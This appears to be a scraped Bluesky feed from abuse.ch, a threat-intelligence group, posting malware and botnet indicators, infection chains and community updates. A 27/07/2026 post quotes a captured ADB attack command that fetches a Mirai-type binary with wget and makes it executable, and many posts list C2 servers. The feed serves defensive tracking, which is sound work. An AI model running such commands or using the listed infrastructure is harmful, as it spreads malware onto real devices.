Sign in

abuse-ch.bsky.social

@abuse-ch.bsky.social
496 followers 3 following 234 posts

Fighting malware and botnets

PostsRepliesMedia
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/09/2026
Did you know that if you run Cowrie SSH and Telnet honeypot 🍯🐝, you can automatically submit malicious URLs caught by it to URLhaus 💡? If you aren't running a Cowrie honeypot yet, you may want to check it out: Project website: 🖥️ cowrie.org GitHub repository: 🖱️ github.com/cowrie/cowrie
Cowrie SSH and Telnet honeypot
020
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/09/2026
A couple of months in and the Community Hub is thriving 🤩 ... 36,441 contributions across all platforms in the last 30 days (+30.8%) 🔥🔥🔥 @geenensp 🥇 on URLhaus (78-month streak!!) @TheRavenFile 🥇 on ThreatFox @whack_sh 🥇 on MalwareBazaar Go see the full Top10 leaderboards 💛 👉 community.abuse.ch
010
abuse-ch.bsky.social @abuse-ch.bsky.social · 14/09/2026
We recently sinkholed a DDoS #botnet of 200,000 compromised Android TV boxes infected with #CECbot malware 🕵️‍♀️. Shortly after, the threat actor responded by registering a rather specific botnet C2 domain 📡 spamhaushackers .at
abuse.ch Hunting
231
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/09/2026
🚨 ANNOUNCEMENT FOR TOP CONTRIBUTORS! 🚨 We’ve been working on something huge and the cat 🐈️ is finally out of the bag 👀 ... we’ve officially partnered with Modat to give FREE Magnify licenses to our top contributors! 🎉🔥
Announcement: New partnership with Modat
120
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2026
#BoratRAT spreading using similar tactics as #ClickFix 👇 1️⃣ Fake Microsoft Security Verification 🔑 leading to malicious PowerShell execution 🖱️ 2️⃣ Command triggers a DNS TXT request to recapture-robot .today 🌐 to obtain a PowerShell script 📜 3️⃣ Script drops payload, infecting host with BoratRAT 💻
BoratRAT spreading through a ClickFix like lure
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 24/08/2026
Overlord RAT 🔌 dropped by Amadey loader 🔥 Botnet C2 server: mypamella .xyz ➡️ NameSilo 🇺🇸 136.175.82.88:443 ➡️ 2ETELECOM🇧🇬 Payload is bulletproof hosted 🛡️at Omegatech LTD 🇳🇱 🌐 urlhaus.abuse.ch/url/3906755/ 📄 Malware sample: bazaar.abuse.ch/sample/ac1f8...
bazaar.abuse.ch
MalwareBazaar - file (OverlordRAT)
file has been detected as OverlordRAT by MalwareBazaar
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/08/2026
NeedleStealer 🪡🪝 written in Go ⤵️ 🔎 HTTP user agents observed: User-Agent: Loader-cli/v1 user-agent: Go-http-client/2.0 📡 Botnet C2s, all behind Cloudflare CDN: woolvilli .com/api/v2 allremdeskriki .com/api/v2 dubl1allremriki .com/api/v2 dubl2allremriki .com/api/v2
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/08/2026
We identified a new malware called #HypeAgent which acts as information stealer & loader. It is dominantly spread through malspam 📧, first observed on August 1, 2026 🔭👀 Key Capabilities ⤵️ 🕵️ Stealer & Loader: Supports 200+ commands; drops/executes payloads, including crypto miners 💸
130
abuse-ch.bsky.social @abuse-ch.bsky.social · 12/08/2026
StealC C2s dropping OverlordRAT, using CloudFlare and Microsoft look-a-like domains 👁️ 🌐 cloud-flare-authenticator .link 🌐 cloud-flare-authenticator .click 🌐 update-microsoft-data .services 📡 89.34.90.45:443 OverlordRAT #botnet C2 server ⤵️ 🌐 download-windows-update .live 📡 151.243.113.94:5173
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/08/2026
Over the past days, active #malspam campaigns targeting LatAm users 🇦🇷🇧🇷🇲🇽 have been delivering the Grandoreiro banking trojan 🏦💰 📧 Email ➔ 📜 JS file ➔ 📑 Fake PDF download Final payload is hosted on MediaFire 🔥 free file hosting
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/08/2026
Rogue #ScreenConnect RMM cluster using a fake @coldcardwallet.bsky.social domain to lure crypto wallet owners 💰 into downloading a fake DocuSign MSI which drops ScreenConnect 🖱️🖥️ ⛓️ Attack Chain: Threat actor domain ➡️ GitHub repo ➡️ ScreenConnect
Fake COLDCARD domain with opendir, leading to rogue ScreenConnect RMM payload
121
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/07/2026
📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as our user base grows, we are introducing API rate limits. 1/2
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 28/07/2026
It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Every day, this community shares data that helps take down malicious infrastructure and now you can see the scale of it, all in one place. The Hub gives you a live view of:
101
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/07/2026
JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️ ADB command: ⚙️ shell:busybox wget 94.154.0.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chmod 777 [...]
urlhaus.abuse.ch
URLhaus - 94.154.43.48
Malware distribution URLs hosted on 94.154.43.48
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/07/2026
Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site
Once the malware sample is executed, it displays the following text on the victim's machineMalware obtaining a PowerShell command via DNS TXT record
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 01/07/2026
Something new is coming for abuse.ch contributors... watch this space! 👀 #ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛
011
abuse-ch.bsky.social @abuse-ch.bsky.social · 22/06/2026
Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 .
Top countries sourcing residential proxy scraping IPs targeting abuse.ch platforms
171
abuse-ch.bsky.social @abuse-ch.bsky.social · 09/06/2026
Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD 🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples ⤵️ hunting.abuse.ch/hunt/6a285c8...
Unidentified botnet C2 trying to hide as FortiGate device
020
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/05/2026
My favorite Remus botnet C2 domain so far 😄 havelbeenpwned .net ⤵️ NICENIC INTERNATIONAL🇨🇳 103.211.219.238:4219⤵️ AS394695 PUBLIC-DOMAIN-REGISTRY 🇮🇳 Malware sample: bazaar.abuse.ch/sample/75fce... More #Remnus IOCs available on ThreatFox 🦊 threatfox.abuse.ch/browse/malwa... /cc @troyhunt.com
RemusStealer malware sample using havelbeenpwned .net  a botnet C2 server
063
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/04/2026
Malspam 📧 targeting Spanish users 🇪🇸 Email ➡️ geo filter ➡️ mediafire ➡️ iso ➡️ vbs 1st stage - geo filter 🛑 vmi3228488.contaboserver .net Contabo 🇩🇪 2nd stage - payload 📄 🌐 urlhaus.abuse.ch/url/3824487/ Dropped iso: bazaar.abuse.ch/sample/faaa4... Botnet C2: 📡 54.197.208.68 Amazon 🇺🇸
Spanish malspamMalicious website targeting Spanish internet users, serving a malicious payload
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 26/02/2026
SparkRAT ➡️ ChromeSetup.msi ➡️ FUD 🔥 msftconnecttest .xyz ⤵️ Creation Date: 2024-12-02 ⤵️ After more than a year, this domain still has a detection rate of 1/93 🤯 Pointing to ⤵️ 154.31.222.217:443 ➡️ DControl Chinese? 🇨🇳 lang="zh-cn" Malware sample: bazaar.abuse.ch/sample/91a29...
bazaar.abuse.ch
MalwareBazaar - ChromeSetup.msi (SparkRAT)
ChromeSetup.msi has been detected as SparkRAT by MalwareBazaar
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 25/02/2026
Proofpoint recently identified a fake RMM (Remote Monitoring and Management Tool) called #TrustConnect and #DocConnect🔎💻 Pivoting the threat in our collection reveals that the threat actors spread the same malware under additional names, including: ➡️SoftConnect ➡️HardConnect ➡️AxisControl
120
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/02/2026
Rogue #ScreenConnect RMM 🕵️‍♂️ Botnet C2: 📡 no.windowupdateservice .com 📡 relay.windowupdateservice .com 📡193.26.115.51:8041 Payload delivery URL: 🌐 urlhaus.abuse.ch/url/3782937/ Malware sample 📄: bazaar.abuse.ch/sample/77dc5... More ScreenConnect RMM IOCs ⤵️ threatfox.abuse.ch/browse/tag/S...
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/02/2026
Yet another RAT in town: RemoteX🖥️🖱️ 🪲 Dropped by Amadey 📃 Written in Golang 💻 Uses HKCU\...\CurrentVersion\Run\RemoteX for persitence (lame 🚽) 🌐 Uses WebSocket for C2 communication 🕵️‍♂️ Unauthenticated RAT admin panel 🤡 Botnet C2: 📡 109.107.168.147:80 (Partner Hosting LTD 🇬🇧)
RemoteX RAT admin panel
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/01/2026
Xillen Stealer 🎣, heavily dropped by Amadey 🔥 Botnet C2: goldenring[.]live/api/logs/check "Invisible. Undetectedable. Unstopable." 🤡 👉 github.com/BengaminButt... Samples ⤵️ bazaar.abuse.ch/browse/signa... Additional IOCs on ThreatFox 🦊 threatfox.abuse.ch/browse/tag/X...
Xillen Stealer admin panel on Cloudflare
000
Reposted by @abuse-ch.bsky.social
PIVOTcon @pivotcon.bsky.social · 20/01/2026
Thank you @spamhaustech.bsky.social & @abuse-ch.bsky.social for being #PIVOTcon26 Silver Sponsor 🎉 Read more about alliance: abuse.ch & spamhaus.com This alliance empowers the largest independently crowdsourced intelligence of tracked malware and botnets pivotcon.org/sponsors #CTI #ThreatIntel
065
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/01/2026
Brazillian banker 🇧🇷 caught by @johnk3r 🎣 GHOST panel 🧐 007consultoriafinanceira .net 83.229.17.124:80 Clouvider 🇺🇸 Payload delivery URL: 🌐https://urlhaus.abuse.ch/url/3759148/ Malware sample (MSI): ⚙️https://bazaar.abuse.ch/sample/2cbafc607c5d38a891ab89799f98b6b754b519706eb6597e4c4f2d4f6fc5db21/
Brazilian Banker "GHOST" panel
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/01/2026
Malspam sent from Microsoft Outlook that is spreading #LogMeIn GoToResolve RMM, enabling threat actors to access the victim's machine from remote 💻🔍🕵️ IOCs: 📡 adwestmailcenter .com ➡️ Landing page 📡 insightme .im ➡️ fake PDF download
Malspam from Microsoft Outlook spreading LogMeIn GoToResolve RMMFake PDF download spreading LogMeIn GoToResolve RMM
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 23/12/2025
CHICXULUB IMPACT 💥 Botnet C2 URLs: 📡 turbokent .name/api/initialize 📡 turbokent .name/api/status Sponsoring domain registrar: NICENIC 🇭🇰 Malware sample 📄: bazaar.abuse.ch/sample/c32e1...
turbokent .name - CHICXULUB IMPACT
011
abuse-ch.bsky.social @abuse-ch.bsky.social · 18/12/2025
New Stealer in town: SantaStealer 🎅🎄 Botnet C2s ➡️all hosted at AS399486 VIRTUO 🇨🇦: 📡31.57.38.119:6767 📡31.57.38.244:6767 📡80.76.49.114:6767 Stealer admin panel (via @darkwebinformer.com 💪): 🕵️ stealer. su Artifacts 💻: C:\tempLog\Clipboard.txt %LocalAppData%\Temp\passwordslog.txt
120
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/12/2025
Love letter ❤️ from a threat actor 🕵️exploiting React2Shell vulnerability (CVE-2025-55182) to spread #Mirai malware ⤵️ fuckoffurlhaus 😂 Payload URLs: 🌐 urlhaus.abuse.ch/host/45.153.... Mirai botnet C2s: 📡 marvisxoxo .st (ISTanCo 🇷🇸) 📡 45.156.87 .231:23789 (AS51396 PFCLOUD 🇩🇪)
Mirai malware delivery URLs
141
abuse-ch.bsky.social @abuse-ch.bsky.social · 15/12/2025
Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️ 🖱️ClickFix -> 📃VBS -> ⚙️MSI Payload delivery host: 🌐https://urlhaus.abuse.ch/host/103.27.157.60/ Malware sample 🤖: bazaar.abuse.ch/sample/4d8e5... Botnet C2 domains: 📡w2li .xyz 📡w2socks .xyz
ClickFix infection chain
111
abuse-ch.bsky.social @abuse-ch.bsky.social · 10/12/2025
Exploitation of recent React RCE vul (CVE-2025-55182 - #React2Shell) leading to #Mirai infection ⤵️ Botnet Mirai C2 domains 📡: fuckphillipthegerman .ru Botnet Mirai C2 servers , all hosted at FORTIS 🇷🇺: 138.124.72.251:52896 138.124.69.154:60328 5.144.176.19:60328
Malicious bast script deliverying Mirai payload
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 08/12/2025
MaksRAT HKCU\Software\Microsoft\Windows\CurrentVersion\Run\javacom Botnet C2s 📡 104.198.24 .41:6656 avocado .gay www.foldacces .online www.makslove .xyz www.mavenrat .xyz www.blackprofit .online Sample shared by @smica83 💪 bazaar.abuse.ch/sample/88310... IOCs threatfox.abuse.ch/browse/tag/M...
MaksRAT botnet C2 traffic
000
abuse-ch.bsky.social @abuse-ch.bsky.social · 05/12/2025
Mirai campaign spreading through 213.209.143.85 (Railnet 🇳🇱), messing around with the victim's system iptables 🤔 Mirai botnet C2 domain: womp.datasurge .vip (NameCheap 🇺🇸) Mirai botnet C2 server: 176.65.148.57:6969 (Pfcloud 🇩🇪) Payload URL: 🌐 urlhaus.abuse.ch/url/3725743/
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 04/12/2025
Mirai botnet #zerobot spreading through 172.86.123.179 (cloudzy 🇦🇪) ⤵️ Mirai botnet C2 domain: 0bot.qzz .io (Gandi SAS 🇫🇷) Mirai botnet C2 server: 140.233.190.96:69 (Internet Magnate 🇿🇦) Payload URLs: 🌐 urlhaus.abuse.ch/host/172.86.... Mirai malware sample: 🤖 bazaar.abuse.ch/sample/9f64e...
Mirai bot "zerobot"
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 03/12/2025
🎉 Massive shout out to URLhaus Top Contributor “geenensp” First seen April 13th 2020 and since then, they’ve shared an unbelievable 844,345 malware URLs!! 😮 Over the last 30 days, they have shared 8,902 URLs, firmly securing their position at the top of the leaderboard 💪 ⤵️
URLhaus Top Contributor “Geenensp”
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 27/11/2025
We’ve identified an interesting malware family 🔍, which we’ve named #GrokPy due to its use of a Grok LLM model 🤖 to solve and subsequently bypass CAPTCHAs 🔥 The malware gets dropped by #Amadey and:
131
abuse-ch.bsky.social @abuse-ch.bsky.social · 19/11/2025
Yet another new stealer in town: #ArkanixStealer 🔥 %AppData%\Arkanix_lol\history.json %AppData%\Arkanix_lol\system_info.json %AppData%\Arkanix_lol\screenshot_monitor_1.png Akranix botnet C2: 📡 arkanix .pw/api/session/create 📡 arkanix .pw/delivery 📡 arkanix .pw/api/discord-injection/template
121
abuse-ch.bsky.social @abuse-ch.bsky.social · 16/11/2025
Potential new stealer dropped by #Amadey 🤖🔍Who can name it? ⤵️ 👉 hunting.abuse.ch/hunt/6919ec1... Botnet C2 domains: 📡defender-temeerty .sbs 📡telemetry-defender .lol Botnet C2 server: 🛑185.100.157.69:443 (Partner Hosting 🇬🇧) Malware sample: 📄 bazaar.abuse.ch/sample/903cd...
100
abuse-ch.bsky.social @abuse-ch.bsky.social · 13/11/2025
#OpEndgame 📣: We assisted in the takedown of infrastructure associated with #Rhadamanthys and share a full list of botnet C2s on ThreatFox 🦊 Full list of Rhadamanthys botnet C2s: 📡 threatfox.abuse.ch/browse/tag/O... Europol press release: 🚨 www.europol.europa.eu/media-press/...
062
abuse-ch.bsky.social @abuse-ch.bsky.social · 11/11/2025
Over the past 30 days, our community shared 27,165 new #IOCs on ThreatFox 🦊 — an 18% increase from the previous month. 👏 Huge shoutout to Juroots, our top contributor with 2,746 IOCs submitted. 💀 The most-shared malware family (or in this case framework)? Clearfake, with 2,817 IOCs reported. ⤵️
Total IOCs Shared (Last 30 Days)
110
abuse-ch.bsky.social @abuse-ch.bsky.social · 05/11/2025
🎉 Thanks to our AMAZING community, MalwareBazaar has reached a significant milestone - over 1 MILLION malware samples shared!! We simply couldn't achieve this without the efforts of our contributors and we want to say a massive THANK YOU 🙏🙏 #milestone #community #grateful #sharingiscaring 😻
021
abuse-ch.bsky.social @abuse-ch.bsky.social · 03/11/2025
Interesting bash script, fully undetected (FUD) 🔥. It conducts various modifications on Linux based systems ⚙️ and uses iptables to forward certain ports to a C2 🔀: 45.156.87.37 Malicious bash script: 📜https://bazaar.abuse.ch/sample/27e2a9abfeb5f72746931dff55cd21b6631bab3aa13d8a1cb67c9319d8692229/
Malicious bash script turning the compromised machine into a proxyMalicious bash script fully undetected (FUD)
010
abuse-ch.bsky.social @abuse-ch.bsky.social · 17/10/2025
Over the last 30 days URLhaus sent out 41,270 abuse reports to hosting providers and network owners - that's up +48.88% on the previous month! 📈 That’s all you. That’s the power of our #community🤘 #AmazingWork #SharingIsCaring
URLHaus abuse reports sent (Last 30 Days) - up 48.88%
041
abuse-ch.bsky.social @abuse-ch.bsky.social · 10/10/2025
Looks like this #Mirai threat actor is a BIG fan of our URLhaus platform 😜 👉 hXXp://45.141.215.196/FuckYou0urlhaus0abuse0ch/ We thought we'd send a little love back to the threat actor... their server’s been taken down, and their #botnet C2 domain is now sinkholed. 😘 ⤵️
130
abuse-ch.bsky.social @abuse-ch.bsky.social · 06/10/2025
📣 Big thanks to MalwareBazaar Top Contributor "JAMESWT_WT" 🙇 First seen: 30 March 2020 and since then, they’ve shared 45,994 malware samples. In the last 30 days alone, they have dropped 1,472 new samples, that’s +30% ⬆️ from the previous month, with 631 samples shared on September 30th. 🔥🔥
Top Contributor MalwareBazaar - JAMESWT_WT
131
abuse-ch.bsky.social @abuse-ch.bsky.social · 30/09/2025
Over the last 30 days, the community shared 26,575 #IOCs on ThreatFox 🦊. That's a 83% jump on the previous month. 🚀 And topping the charts: XtremeRAT, with 6,640 IOCs 💀 Find more ThreatFox statistics here: 👉 threatfox.abuse.ch/statistics #SharingIsCaring #XtremeRAT #Malware #ThreatIntel
021
abuse-ch.bsky.social @abuse-ch.bsky.social · 26/09/2025
🔥 "Kamasers" is a DDoS botnet, first seen in August, and dropped by Amadey. The malware name was adapted from the User-Agent used during network communication with the C2 server. The first time we encountered it, the sample was written in Golang language. ⤵️
120
abuse-ch.bsky.social @abuse-ch.bsky.social · 02/09/2025
We’ve just rolled out two new features on MalwareBazaar 🆕 👀 ➡️ OpenTIP integration: Results from @kasperskylab.bsky.social OpenTIP are now included for all samples on MalwareBazaar, available via both, UI and API 🖥️
Kaspersky OpenTIP integration on MalwareBazaar
110